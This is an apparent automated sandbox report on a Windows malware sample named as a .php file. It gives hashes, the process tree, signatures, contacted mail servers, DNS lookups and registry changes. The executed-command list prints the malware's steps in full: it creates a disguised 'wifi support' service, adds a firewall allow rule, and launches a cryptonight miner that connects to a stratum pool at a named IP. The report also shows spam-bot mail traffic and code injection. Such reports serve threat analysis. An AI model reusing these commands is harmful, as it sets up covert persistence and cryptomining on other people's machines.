· 6 years ago · Jul 24, 2019, 02:00 AM
1
2* MalFamily: ""
3
4* MalScore: 10.0
5
6* File Name: "Exes_7ca883d97b4f485451d4d57b93a2d3de.php"
7* File Size: 279552
8* File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
9* SHA256: "1892a57c152a181b8f83ac44c9948252296b85e95d3c7995c08f47ad79b0f161"
10* MD5: "7ca883d97b4f485451d4d57b93a2d3de"
11* SHA1: "3d068c67b04dfb1e21d9e1279ef9d6f4fd60ff77"
12* SHA512: "441b5a4c61494f0f2b9baed484f3d76d9375b63347e4e2959850861c9e5ce417674e99a79a7109ed35b432e4aa45bb9e94ab19c5094637756ab77762c2220ac9"
13* CRC32: "2742E850"
14* SSDEEP: "3072:7rzKWRrM6wDpaa4XSrjaZADutwAKl+atzMWwQ5Ub+6bNhPNsUm7hQu+B8VEn+pBm:7yFDIGNlnWGub1lsAu+JnCUs4xcREPA"
15
16* Process Execution:
17 "Exes_7ca883d97b4f485451d4d57b93a2d3de.php",
18 "cmd.exe",
19 "cmd.exe",
20 "sc.exe",
21 "sc.exe",
22 "sc.exe",
23 "netsh.exe",
24 "services.exe",
25 "fogfoaev.exe",
26 "svchost.exe",
27 "svchost.exe",
28 "taskhost.exe",
29 "sc.exe",
30 "svchost.exe",
31 "WerFault.exe",
32 "wermgr.exe",
33 "svchost.exe"
34
35
36* Executed Commands:
37 "\"C:\\Windows\\System32\\cmd.exe\" /C mkdir C:\\Windows\\SysWOW64\\wpiyoeyo\\",
38 "cmd /C mkdir C:\\Windows\\SysWOW64\\wpiyoeyo\\",
39 "\"C:\\Windows\\System32\\cmd.exe\" /C move /Y \"C:\\Users\\user\\AppData\\Local\\Temp\\fogfoaev.exe\" C:\\Windows\\SysWOW64\\wpiyoeyo\\",
40 "cmd /C move /Y \"C:\\Users\\user\\AppData\\Local\\Temp\\fogfoaev.exe\" C:\\Windows\\SysWOW64\\wpiyoeyo\\",
41 "\"C:\\Windows\\System32\\sc.exe\" create wpiyoeyo binPath= \"C:\\Windows\\SysWOW64\\wpiyoeyo\\fogfoaev.exe /d\\\"C:\\Users\\user\\AppData\\Local\\Temp\\Exes_7ca883d97b4f485451d4d57b93a2d3de.php\\\"\" type= own start= auto DisplayName= \"wifi support\"",
42 "sc create wpiyoeyo binPath= \"C:\\Windows\\SysWOW64\\wpiyoeyo\\fogfoaev.exe /d\\\"C:\\Users\\user\\AppData\\Local\\Temp\\Exes_7ca883d97b4f485451d4d57b93a2d3de.php\\\"\" type= own start= auto DisplayName= \"wifi support\"",
43 "\"C:\\Windows\\System32\\sc.exe\" description wpiyoeyo \"wifi internet conection\"",
44 "sc description wpiyoeyo \"wifi internet conection\"",
45 "\"C:\\Windows\\System32\\sc.exe\" start wpiyoeyo",
46 "sc start wpiyoeyo",
47 "\"C:\\Windows\\System32\\netsh.exe\" advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"C:\\Windows\\SysWOW64\\svchost.exe\" enable=yes>nul",
48 "netsh advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"C:\\Windows\\SysWOW64\\svchost.exe\" enable=yes>nul",
49 "C:\\Windows\\SysWOW64\\wpiyoeyo\\fogfoaev.exe /d\"C:\\Users\\user\\AppData\\Local\\Temp\\Exes_7ca883d97b4f485451d4d57b93a2d3de.php\"",
50 "taskhost.exe $(Arg0)",
51 "C:\\Windows\\system32\\sc.exe start w32time task_started",
52 "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
53 "C:\\Windows\\system32\\svchost.exe -k LocalService",
54 "svchost.exe",
55 "svchost.exe -a cryptonight-heavy -o stratum+tcp://185.16.41.185:8087 -u w1 -p x --nicehash --safe",
56 "C:\\Windows\\system32\\WerFault.exe -u -p 2060 -s 288",
57 "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_087f158e\""
58
59
60* Signatures Detected:
61
62 "Description": "At least one process apparently crashed during execution",
63 "Details":
64
65
66 "Description": "Creates RWX memory",
67 "Details":
68
69
70 "Description": "A process attempted to delay the analysis task.",
71 "Details":
72
73 "Process": "svchost.exe tried to sleep 1830 seconds, actually delayed analysis time by 0 seconds"
74
75
76
77
78 "Description": "Attempts to connect to a dead IP:Port (97 unique times)",
79 "Details":
80
81 "IP": "71.6.142.100:25"
82
83
84 "IP": "66.218.85.52:25"
85
86
87 "IP": "207.211.30.181:25"
88
89
90 "IP": "36.110.185.79:25"
91
92
93 "IP": "85.25.119.25:419"
94
95
96 "IP": "104.47.38.33:25"
97
98
99 "IP": "192.102.218.8:25"
100
101
102 "IP": "94.136.40.150:25"
103
104
105 "IP": "150.160.254.109:25"
106
107
108 "IP": "172.217.6.68:80"
109
110
111 "IP": "144.76.199.2:419"
112
113
114 "IP": "216.129.105.38:25"
115
116
117 "IP": "93.158.134.89:25"
118
119
120 "IP": "104.47.4.33:25"
121
122
123 "IP": "104.47.41.36:25"
124
125
126 "IP": "66.218.85.151:25"
127
128
129 "IP": "207.69.189.231:25"
130
131
132 "IP": "161.225.202.27:25"
133
134
135 "IP": "67.195.228.94:25"
136
137
138 "IP": "104.44.194.232:25"
139
140
141 "IP": "104.16.119.50:443"
142
143
144 "IP": "144.76.108.92:483"
145
146
147 "IP": "67.195.228.109:25"
148
149
150 "IP": "67.231.152.47:25"
151
152
153 "IP": "94.100.180.104:25"
154
155
156 "IP": "212.23.88.242:25"
157
158
159 "IP": "94.100.180.31:25"
160
161
162 "IP": "74.125.129.27:25"
163
164
165 "IP": "68.232.149.160:25"
166
167
168 "IP": "148.163.156.1:25"
169
170
171 "IP": "205.137.77.32:25"
172
173
174 "IP": "148.163.158.123:25"
175
176
177 "IP": "67.231.144.73:25"
178
179
180 "IP": "202.4.96.26:25"
181
182
183 "IP": "67.231.156.236:25"
184
185
186 "IP": "66.218.85.139:25"
187
188
189 "IP": "159.153.191.239:443"
190
191
192 "IP": "67.195.228.111:25"
193
194
195 "IP": "13.77.161.179:80"
196
197
198 "IP": "98.137.159.25:25"
199
200
201 "IP": "64.233.177.27:25"
202
203
204 "IP": "67.195.228.110:25"
205
206
207 "IP": "98.136.101.116:25"
208
209
210 "IP": "212.54.58.11:25"
211
212
213 "IP": "104.47.10.33:25"
214
215
216 "IP": "77.88.21.89:25"
217
218
219 "IP": "104.47.36.33:25"
220
221
222 "IP": "74.125.195.27:25"
223
224
225 "IP": "74.125.142.26:25"
226
227
228 "IP": "185.16.41.185:8087"
229
230
231 "IP": "176.111.49.43:419"
232
233
234 "IP": "98.137.159.27:25"
235
236
237 "IP": "104.47.41.33:25"
238
239
240 "IP": "46.4.52.109:419"
241
242
243 "IP": "91.207.212.87:25"
244
245
246 "IP": "104.47.125.33:25"
247
248
249 "IP": "167.127.246.35:25"
250
251
252 "IP": "98.137.157.43:25"
253
254
255 "IP": "74.125.129.26:25"
256
257
258 "IP": "211.231.108.47:25"
259
260
261 "IP": "65.54.188.72:25"
262
263
264 "IP": "18.209.118.139:25"
265
266
267 "IP": "68.178.213.203:25"
268
269
270 "IP": "206.152.134.65:25"
271
272
273 "IP": "172.217.6.68:443"
274
275
276 "IP": "125.209.238.100:25"
277
278
279 "IP": "67.195.228.106:25"
280
281
282 "IP": "98.137.159.24:25"
283
284
285 "IP": "208.89.132.27:25"
286
287
288 "IP": "65.54.188.110:25"
289
290
291 "IP": "213.120.69.2:25"
292
293
294 "IP": "195.231.225.144:25"
295
296
297 "IP": "177.153.23.241:25"
298
299
300 "IP": "45.56.121.201:25"
301
302
303 "IP": "148.163.149.93:25"
304
305
306 "IP": "80.67.18.126:25"
307
308
309 "IP": "209.85.144.26:25"
310
311
312 "IP": "67.231.148.237:25"
313
314
315 "IP": "23.198.7.66:443"
316
317
318 "IP": "104.47.53.36:25"
319
320
321 "IP": "104.47.32.36:25"
322
323
324 "IP": "89.175.32.82:25"
325
326
327 "IP": "104.47.2.33:25"
328
329
330 "IP": "43.231.4.7:443"
331
332
333 "IP": "98.137.159.28:25"
334
335
336 "IP": "104.47.4.36:25"
337
338
339 "IP": "65.55.37.120:25"
340
341
342 "IP": "104.16.120.50:443"
343
344
345 "IP": "94.130.209.113:80"
346
347
348 "IP": "96.114.157.80:25"
349
350
351 "IP": "167.206.4.79:25"
352
353
354 "IP": "37.1.206.139:80"
355
356
357 "IP": "74.125.141.26:25"
358
359
360 "IP": "69.31.136.5:443"
361
362
363 "IP": "195.146.81.131:25"
364
365
366 "IP": "149.255.58.37:25"
367
368
369 "IP": "144.76.199.43:419"
370
371
372
373
374 "Description": "Network anomalies occurred during the analysis.",
375 "Details":
376
377 "Anomaly": "'185.16.41.185' getaddrinfo with no actual connection to the IP."
378
379
380
381
382 "Description": "Starts servers listening on 0.0.0.0:7425",
383 "Details":
384
385
386 "Description": "Reads data out of its own binary image",
387 "Details":
388
389 "self_read": "process: Exes_7ca883d97b4f485451d4d57b93a2d3de.php, pid: 2004, offset: 0x00000000, length: 0x00000040"
390
391
392 "self_read": "process: Exes_7ca883d97b4f485451d4d57b93a2d3de.php, pid: 2004, offset: 0x00000000, length: 0x00044400"
393
394
395 "self_read": "process: Exes_7ca883d97b4f485451d4d57b93a2d3de.php, pid: 2004, offset: 0x000000f0, length: 0x000001c0"
396
397
398
399
400 "Description": "A process created a hidden window",
401 "Details":
402
403 "Process": "Exes_7ca883d97b4f485451d4d57b93a2d3de.php -> cmd"
404
405
406 "Process": "Exes_7ca883d97b4f485451d4d57b93a2d3de.php -> cmd"
407
408
409 "Process": "Exes_7ca883d97b4f485451d4d57b93a2d3de.php -> sc"
410
411
412 "Process": "Exes_7ca883d97b4f485451d4d57b93a2d3de.php -> sc"
413
414
415 "Process": "Exes_7ca883d97b4f485451d4d57b93a2d3de.php -> sc"
416
417
418 "Process": "Exes_7ca883d97b4f485451d4d57b93a2d3de.php -> netsh"
419
420
421 "Process": "svchost.exe -> svchost.exe -a cryptonight-heavy -o stratum+tcp://185.16.41.185:8087 -u w1 -p x --nicehash --safe"
422
423
424
425
426 "Description": "Drops a binary and executes it",
427 "Details":
428
429 "binary": "C:\\Windows\\SysWOW64\\wpiyoeyo\\fogfoaev.exe"
430
431
432
433
434 "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
435 "Details":
436
437 "post_no_referer": "HTTP traffic contains a POST request with no referer header"
438
439
440 "http_version_old": "HTTP traffic uses version 1.0"
441
442
443 "suspicious_request": "http://nolive.ir/http://nolive.ir/wp-login.php?action=register"
444
445
446 "suspicious_request": "http://work.a-poster.info/http://work.a-poster.info:25000/"
447
448
449
450
451 "Description": "Performs some HTTP requests",
452 "Details":
453
454 "url": "http://www.google.com/"
455
456
457 "url": "http://nolive.ir/http://nolive.ir/wp-login.php?action=register"
458
459
460 "url": "http://work.a-poster.info/http://work.a-poster.info:25000/"
461
462
463
464
465 "Description": "Enumerates services, possibly for anti-virtualization",
466 "Details":
467
468
469 "Description": "Executed a process and injected code into it, probably while unpacking",
470 "Details":
471
472 "Injection": "fogfoaev.exe(2124) -> svchost.exe(2052)"
473
474
475
476
477 "Description": "Deletes its original binary from disk",
478 "Details":
479
480
481 "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
482 "Details":
483
484 "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 11012645 times"
485
486
487
488
489 "Description": "Creates or sets a registry key to a long series of bytes, possibly to store a binary or malware config",
490 "Details":
491
492 "regkeyval": "HKEY_USERS\\.DEFAULT\\Control Panel\\Buses\\Config3"
493
494
495 "regkeyval": "HKEY_USERS\\.DEFAULT\\Control Panel\\Buses\\Config2"
496
497
498 "regkeyval": "HKEY_USERS\\.DEFAULT\\Control Panel\\Buses\\Config1"
499
500
501 "regkeyval": "HKEY_USERS\\.DEFAULT\\Control Panel\\Buses\\Config0"
502
503
504
505
506 "Description": "Installs itself for autorun at Windows startup",
507 "Details":
508
509 "service name": "wpiyoeyo"
510
511
512 "service path": "C:\\Windows\\SysWOW64\\wpiyoeyo\\fogfoaev.exe /d\"C:\\Users\\user\\AppData\\Local\\Temp\\Exes_7ca883d97b4f485451d4d57b93a2d3de.php\""
513
514
515 "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\wpiyoeyo\\ImagePath"
516
517
518 "data": "C:\\Windows\\SysWOW64\\wpiyoeyo\\fogfoaev.exe"
519
520
521
522
523 "Description": "Checks the system manufacturer, likely for anti-virtualization",
524 "Details":
525
526
527 "Description": "Attempts to interact with an Alternate Data Stream (ADS)",
528 "Details":
529
530 "file": "C:\\Windows\\System32\\config\\systemprofile:.repos"
531
532
533 "file": "C:\\Windows\\System32\\config\\systemprofile\\Local Settings:.repos"
534
535
536
537
538
539* Started Service:
540 "wpiyoeyo",
541 "WerSvc",
542 "W32Time"
543
544
545* Mutexes:
546 "Local\\ZoneAttributeCacheCounterMutex",
547 "Local\\ZonesCacheCounterMutex",
548 "Local\\ZonesLockedCacheCounterMutex",
549 "Local\\WERReportingForProcess2060",
550 "Global\\\\xe5\\x88\\x90\\xc2\\xa3",
551 "Global\\\\xed\\x95\\xb0\\xc7\\x98",
552 "WERUI_BEX64-eb71ef964c95de5826f5dbf6417783430b96dd1"
553
554
555* Modified Files:
556 "\\??\\pipe\\ngzpfvpf",
557 "C:\\Users\\user\\AppData\\Local\\Temp\\fogfoaev.exe",
558 "C:\\Windows\\SysWOW64\\wpiyoeyo\\fogfoaev.exe",
559 "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
560 "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
561 "C:\\Windows\\sysnative\\LogFiles\\Scm\\4e6828f4-11de-47bf-b7df-2249f4bdea4e",
562 "\\Device\\Http\\Communication",
563 "C:\\Windows\\System32\\config\\systemprofile:.repos",
564 "\\??\\PIPE\\lsarpc",
565 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAE58.tmp.appcompat.txt",
566 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER36F2.tmp.WERInternalMetadata.xml",
567 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER3722.tmp.hdmp",
568 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER40E7.tmp.mdmp",
569 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_087f158e\\WERAE58.tmp.appcompat.txt",
570 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_087f158e\\WER36F2.tmp.WERInternalMetadata.xml",
571 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_087f158e\\WER3722.tmp.hdmp",
572 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_087f158e\\WER40E7.tmp.mdmp",
573 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_087f158e\\Report.wer",
574 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_087f158e\\Report.wer.tmp"
575
576
577* Deleted Files:
578 "C:\\Users\\user\\AppData\\Local\\Temp\\fogfoaev.exe",
579 "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_7ca883d97b4f485451d4d57b93a2d3de.php",
580 "C:\\log_plg_proxy.txt",
581 "C:\\Windows\\Temp\\log_plg_proxy.txt",
582 "C:\\log_plg_text.txt",
583 "C:\\Windows\\Temp\\log_plg_text.txt",
584 "C:\\log_plg_smtp.txt",
585 "C:\\Windows\\Temp\\log_plg_smtp.txt",
586 "C:\\log_plg_blist.txt",
587 "C:\\Windows\\Temp\\log_plg_blist.txt",
588 "C:\\log_plg_miner.txt",
589 "C:\\Windows\\Temp\\log_plg_miner.txt",
590 "C:\\log_plg_sys.txt",
591 "C:\\Windows\\Temp\\log_plg_sys.txt",
592 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAE58.tmp",
593 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAE58.tmp.appcompat.txt",
594 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER36F2.tmp",
595 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER36F2.tmp.WERInternalMetadata.xml",
596 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER3722.tmp",
597 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER3722.tmp.hdmp",
598 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER40E7.tmp",
599 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER40E7.tmp.mdmp",
600 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_087f158e\\Report.wer.tmp"
601
602
603* Modified Registry Keys:
604 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
605 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
606 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
607 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
608 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
609 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-100",
610 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-101",
611 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-103",
612 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-102",
613 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-1",
614 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-2",
615 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-4",
616 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-3",
617 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-100",
618 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-101",
619 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-102",
620 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-103",
621 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-100",
622 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-101",
623 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-102",
624 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-103",
625 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\wpiyoeyo\\ImagePath",
626 "HKEY_CURRENT_USER\\Control Panel\\Buses",
627 "HKEY_USERS\\.DEFAULT\\Control Panel\\Buses\\Config0",
628 "HKEY_USERS\\.DEFAULT\\Control Panel\\Buses\\Config1",
629 "HKEY_USERS\\.DEFAULT\\Control Panel\\Buses\\Config2",
630 "HKEY_USERS\\.DEFAULT\\Control Panel\\Buses\\Config3",
631 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\Windows\\SysWOW64\\wpiyoeyo",
632 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining",
633 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
634 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent"
635
636
637* Deleted Registry Keys:
638 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
639 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
640 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
641 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
642 "HKEY_USERS\\.DEFAULT\\Control Panel\\Buses\\Config1",
643 "HKEY_USERS\\.DEFAULT\\Control Panel\\Buses\\Config4"
644
645
646* DNS Communications:
647
648 "type": "A",
649 "request": "microsoft.com",
650 "answers":
651
652 "data": "104.215.148.63",
653 "type": "A"
654
655
656 "data": "40.113.200.201",
657 "type": "A"
658
659
660 "data": "13.77.161.179",
661 "type": "A"
662
663
664 "data": "40.112.72.205",
665 "type": "A"
666
667
668 "data": "40.76.4.15",
669 "type": "A"
670
671
672
673
674 "type": "MX",
675 "request": "microsoft.com",
676 "answers":
677
678 "data": "microsoft-com.mail.protection.outlook.com",
679 "type": "MX"
680
681
682
683
684 "type": "A",
685 "request": "microsoft-com.mail.protection.outlook.com",
686 "answers":
687
688 "data": "104.47.53.36",
689 "type": "A"
690
691
692
693
694 "type": "MX",
695 "request": "yahoo.com",
696 "answers":
697
698 "data": "mta5.am0.yahoodns.net",
699 "type": "MX"
700
701
702 "data": "mta7.am0.yahoodns.net",
703 "type": "MX"
704
705
706 "data": "mta6.am0.yahoodns.net",
707 "type": "MX"
708
709
710
711
712 "type": "A",
713 "request": "mta6.am0.yahoodns.net",
714 "answers":
715
716 "data": "74.6.137.64",
717 "type": "A"
718
719
720 "data": "67.195.228.106",
721 "type": "A"
722
723
724 "data": "67.195.228.109",
725 "type": "A"
726
727
728 "data": "98.137.159.27",
729 "type": "A"
730
731
732 "data": "98.137.159.26",
733 "type": "A"
734
735
736 "data": "74.6.137.63",
737 "type": "A"
738
739
740 "data": "66.218.85.52",
741 "type": "A"
742
743
744 "data": "67.195.228.110",
745 "type": "A"
746
747
748 "data": "67.195.228.94",
749 "type": "A"
750
751
752 "data": "67.195.228.111",
753 "type": "A"
754
755
756 "data": "66.218.85.139",
757 "type": "A"
758
759
760 "data": "98.137.159.25",
761 "type": "A"
762
763
764 "data": "98.137.159.24",
765 "type": "A"
766
767
768 "data": "98.137.159.28",
769 "type": "A"
770
771
772 "data": "74.6.137.65",
773 "type": "A"
774
775
776
777
778 "type": "A",
779 "request": "222.87.245.185.dnsbl.sorbs.net",
780 "answers":
781
782 "data": "",
783 "type": "NXDOMAIN"
784
785
786
787
788 "type": "A",
789 "request": "222.87.245.185.bl.spamcop.net",
790 "answers":
791
792 "data": "",
793 "type": "NXDOMAIN"
794
795
796
797
798 "type": "A",
799 "request": "222.87.245.185.zen.spamhaus.org",
800 "answers":
801
802 "data": "",
803 "type": "NXDOMAIN"
804
805
806
807
808 "type": "A",
809 "request": "222.87.245.185.sbl-xbl.spamhaus.org",
810 "answers":
811
812 "data": "",
813 "type": "NXDOMAIN"
814
815
816
817
818 "type": "A",
819 "request": "222.87.245.185.cbl.abuseat.org",
820 "answers":
821
822 "data": "",
823 "type": "NXDOMAIN"
824
825
826
827
828 "type": "MX",
829 "request": "vas.com",
830 "answers":
831
832 "data": "inbound-smtp.us-west-2.amazon.com",
833 "type": "MX"
834
835
836 "data": "vas-com.mail.protection.outlook.com",
837 "type": "MX"
838
839
840
841
842 "type": "A",
843 "request": "mx1.hotmail.com",
844 "answers":
845
846 "data": "65.55.92.168",
847 "type": "A"
848
849
850 "data": "104.44.194.237",
851 "type": "A"
852
853
854 "data": "65.54.188.72",
855 "type": "A"
856
857
858 "data": "65.55.37.72",
859 "type": "A"
860
861
862 "data": "65.55.37.88",
863 "type": "A"
864
865
866 "data": "104.44.194.231",
867 "type": "A"
868
869
870 "data": "104.44.194.234",
871 "type": "A"
872
873
874 "data": "104.44.194.236",
875 "type": "A"
876
877
878 "data": "104.44.194.233",
879 "type": "A"
880
881
882 "data": "104.44.194.232",
883 "type": "A"
884
885
886 "data": "65.55.33.135",
887 "type": "A"
888
889
890 "data": "65.55.92.184",
891 "type": "A"
892
893
894 "data": "65.55.37.104",
895 "type": "A"
896
897
898 "data": "104.44.194.235",
899 "type": "A"
900
901
902 "data": "65.55.92.136",
903 "type": "A"
904
905
906
907
908 "type": "A",
909 "request": "vas-com.mail.protection.outlook.com",
910 "answers":
911
912 "data": "104.47.33.36",
913 "type": "A"
914
915
916 "data": "104.47.32.36",
917 "type": "A"
918
919
920
921
922 "type": "MX",
923 "request": "hillyard.com",
924 "answers":
925
926 "data": "us-smtp-inbound-1.mimecast.com",
927 "type": "MX"
928
929
930 "data": "us-smtp-inbound-2.mimecast.com",
931 "type": "MX"
932
933
934
935
936 "type": "A",
937 "request": "mta7.am0.yahoodns.net",
938 "answers":
939
940 "data": "67.195.228.94",
941 "type": "A"
942
943
944 "data": "74.6.137.64",
945 "type": "A"
946
947
948 "data": "66.218.85.52",
949 "type": "A"
950
951
952 "data": "67.195.228.106",
953 "type": "A"
954
955
956 "data": "98.137.159.25",
957 "type": "A"
958
959
960 "data": "98.137.159.24",
961 "type": "A"
962
963
964 "data": "67.195.228.111",
965 "type": "A"
966
967
968 "data": "67.195.228.110",
969 "type": "A"
970
971
972 "data": "74.6.137.63",
973 "type": "A"
974
975
976 "data": "98.137.159.26",
977 "type": "A"
978
979
980 "data": "98.137.159.28",
981 "type": "A"
982
983
984 "data": "67.195.228.109",
985 "type": "A"
986
987
988 "data": "98.137.159.27",
989 "type": "A"
990
991
992 "data": "74.6.137.65",
993 "type": "A"
994
995
996 "data": "66.218.85.139",
997 "type": "A"
998
999
1000
1001
1002 "type": "A",
1003 "request": "us-smtp-inbound-1.mimecast.com",
1004 "answers":
1005
1006 "data": "207.211.30.102",
1007 "type": "A"
1008
1009
1010 "data": "205.139.110.141",
1011 "type": "A"
1012
1013
1014 "data": "205.139.110.221",
1015 "type": "A"
1016
1017
1018 "data": "205.139.110.181",
1019 "type": "A"
1020
1021
1022 "data": "207.211.30.237",
1023 "type": "A"
1024
1025
1026 "data": "205.139.110.242",
1027 "type": "A"
1028
1029
1030 "data": "205.139.110.102",
1031 "type": "A"
1032
1033
1034 "data": "207.211.30.107",
1035 "type": "A"
1036
1037
1038 "data": "207.211.30.181",
1039 "type": "A"
1040
1041
1042 "data": "205.139.110.107",
1043 "type": "A"
1044
1045
1046 "data": "207.211.30.221",
1047 "type": "A"
1048
1049
1050 "data": "205.139.110.145",
1051 "type": "A"
1052
1053
1054 "data": "207.211.30.145",
1055 "type": "A"
1056
1057
1058 "data": "207.211.30.242",
1059 "type": "A"
1060
1061
1062 "data": "207.211.30.141",
1063 "type": "A"
1064
1065
1066 "data": "205.139.110.177",
1067 "type": "A"
1068
1069
1070
1071
1072 "type": "MX",
1073 "request": "randomwag.com",
1074 "answers":
1075
1076 "data": "",
1077 "type": "NXDOMAIN"
1078
1079
1080
1081
1082 "type": "MX",
1083 "request": "bardakov.ru",
1084 "answers":
1085
1086 "data": "aspmx2.googlemail.com",
1087 "type": "MX"
1088
1089
1090 "data": "alt2.aspmx.l.google.com",
1091 "type": "MX"
1092
1093
1094 "data": "alt1.aspmx.l.google.com",
1095 "type": "MX"
1096
1097
1098 "data": "aspmx3.googlemail.com",
1099 "type": "MX"
1100
1101
1102 "data": "aspmx.l.google.com",
1103 "type": "MX"
1104
1105
1106
1107
1108 "type": "MX",
1109 "request": "address.com",
1110 "answers":
1111
1112 "data": "mail05.mailtwo.com",
1113 "type": "MX"
1114
1115
1116 "data": "mail04.mailtwo.com",
1117 "type": "MX"
1118
1119
